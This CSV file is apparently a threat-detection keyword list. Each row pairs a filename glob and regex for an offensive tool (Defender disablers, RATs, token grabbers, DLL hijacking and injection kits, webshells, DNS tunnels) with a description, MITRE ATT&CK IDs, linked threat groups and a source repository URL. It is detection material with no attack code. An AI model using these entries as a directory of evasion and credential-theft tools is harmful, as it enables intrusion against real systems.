"*\DirCreate2System\bin\*",".{0,1000}\\DirCreate2System\\bin\\.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","14938"
"*\dirdevil.ps1*",".{0,1000}\\dirdevil\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","14939"
"*\dirdevil_decoder_mini.ps1*",".{0,1000}\\dirdevil_decoder_mini\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","14940"
"*\dirdevil_decoder_only.ps1*",".{0,1000}\\dirdevil_decoder_only\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","14941"
"*\DirtyCLR.sln*",".{0,1000}\\DirtyCLR\.sln.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","N/A","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","14943"
"*\DirtyCLR-main*",".{0,1000}\\DirtyCLR\-main.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","N/A","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","14944"
"*\DirtyVanity.cpp*",".{0,1000}\\DirtyVanity\.cpp.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","14945"
"*\DirtyVanity.sln*",".{0,1000}\\DirtyVanity\.sln.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","14946"
"*\dis_defender.exe*",".{0,1000}\\dis_defender\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14947"
"*\Disable_defender.py*",".{0,1000}\\Disable_defender\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","14949"
"*\disableav.bat*",".{0,1000}\\disableav\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","14950"
"*\disable-defender.exe*",".{0,1000}\\disable\-defender\.exe.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","N/A","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","14951"
"*\disable-defender.rar*",".{0,1000}\\disable\-defender\.rar.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14952"
"*\Disable-TamperProtection\*",".{0,1000}\\Disable\-TamperProtection\\.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","14953"
"*\DisableWD.7z*",".{0,1000}\\DisableWD\.7z.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","Dispossessor","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","N/A","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A","14954"
"*\DisableWD.dll,*",".{0,1000}\\DisableWD\.dll,.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","14955"
"*\Disable-Windows-Defender.pdb*",".{0,1000}\\Disable\-Windows\-Defender\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14956"
"*\Discord rat.exe*",".{0,1000}\\Discord\srat\.exe.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","14957"
"*\discord-c2\*",".{0,1000}\\discord\-c2\\.{0,1000}","offensive_tool_keyword","discord-c2","C2 communication with discord","T1102.003 - T1071.001 - T1027.010 - T1105 - T1090.002","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bmdyy/discord-c2","1","0","N/A","N/A","10","10","60","6","2022-12-29T03:05:05Z","2022-12-08T19:10:23Z","14958"
"*\Discord-RAT-2.0*",".{0,1000}\\Discord\-RAT\-2\.0.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","14959"
"*\Discord-RAT-2.0-main*",".{0,1000}\\Discord\-RAT\-2\.0\-main.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","14960"
"*\DiscordTokenExfilterater.cs*",".{0,1000}\\DiscordTokenExfilterater\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","14961"
"*\dist\sigthief.exe*",".{0,1000}\\dist\\sigthief\.exe.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","0","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","14962"
"*\DitExplorer.sln*",".{0,1000}\\DitExplorer\.sln.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","14963"
"*\Dive Shell 1.0 - Emperor Hacking Team.php*",".{0,1000}\\Dive\sShell\s1\.0\s\-\sEmperor\sHacking\sTeam\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14964"
"*\dkmc.py*",".{0,1000}\\dkmc\.py.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","14965"
"*\DLHell.py*",".{0,1000}\\DLHell\.py.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","14966"
"*\DLHell-main\*",".{0,1000}\\DLHell\-main\\.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","14967"
"*\DLL_Hijacking.*",".{0,1000}\\DLL_Hijacking\..{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","14968"
"*\dll_inject.exe*",".{0,1000}\\dll_inject\.exe.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","14969"
"*\DLLEnc.ps1*",".{0,1000}\\DLLEnc\.ps1.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","14970"
"*\Dll-EvtExportLog.cpp*",".{0,1000}\\Dll\-EvtExportLog\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14971"
"*\Dll-EvtExportLog.dll*",".{0,1000}\\Dll\-EvtExportLog\.dll.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14972"
"*\dllexploit.cpp*",".{0,1000}\\dllexploit\.cpp.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","14973"
"*\dllexploit.exe*",".{0,1000}\\dllexploit\.exe.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","14974"
"*\DllExport.bat*",".{0,1000}\\DllExport\.bat.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","14975"
"*\DllExport.bat*",".{0,1000}\\DllExport\.bat.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","14976"
"*\dll-hijack-by-proxying*",".{0,1000}\\dll\-hijack\-by\-proxying.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","0","N/A","N/A","7","5","498","103","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z","14977"
"*\dll-hijack-by-proxying-master*",".{0,1000}\\dll\-hijack\-by\-proxying\-master.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","0","N/A","N/A","7","5","498","103","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z","14978"
"*\DLLHound.ps1*",".{0,1000}\\DLLHound\.ps1.{0,1000}","offensive_tool_keyword","DLLHound","Find potential DLL Sideloads on your windows computer","T1574.001 - T1574.002","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","0","N/A","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","14979"
"*\dllinject.py*",".{0,1000}\\dllinject\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","14980"
"*\dllinjection_rs.exe*",".{0,1000}\\dllinjection_rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","14981"
"*\dll-installer.ps1*",".{0,1000}\\dll\-installer\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","14982"
"*\dllproxy.nim*",".{0,1000}\\dllproxy\.nim.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","14983"
"*\Dll-rewriting.cpp*",".{0,1000}\\Dll\-rewriting\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14984"
"*\Dll-rewriting.dll*",".{0,1000}\\Dll\-rewriting\.dll.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14985"
"*\DLLScan_$timestamp.csv*",".{0,1000}\\DLLScan_\$timestamp\.csv.{0,1000}","offensive_tool_keyword","DLLHound","Find potential DLL Sideloads on your windows computer","T1574.001 - T1574.002","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","0","N/A","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","14986"
"*\dll-sideload\main.cpp*",".{0,1000}\\dll\-sideload\\main\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","14987"
"*\DllVoidFunction.txt*",".{0,1000}\\DllVoidFunction\.txt.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","14988"
"*\dns2tcp\*",".{0,1000}\\dns2tcp\\.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","14990"
"*\dns2tcp\server*",".{0,1000}\\dns2tcp\\server.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","14991"
"*\dns2tcp-0.*",".{0,1000}\\dns2tcp\-0\..{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","14992"
"*\dnscan.py*",".{0,1000}\\dnscan\.py.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","14993"
"*\dns-cat.exe*",".{0,1000}\\dns\-cat\.exe.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","14994"
"*\dnschef.exe*",".{0,1000}\\dnschef\.exe.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","14995"
"*\dnschef.ini*",".{0,1000}\\dnschef\.ini.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","14996"
"*\dnschef.log*",".{0,1000}\\dnschef\.log.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","14997"
"*\dnschef.py*",".{0,1000}\\dnschef\.py.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","14998"
"*\dnschef-ng\*",".{0,1000}\\dnschef\-ng\\.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","14999"
"*\dnscrypt-proxy*",".{0,1000}\\dnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","15000"
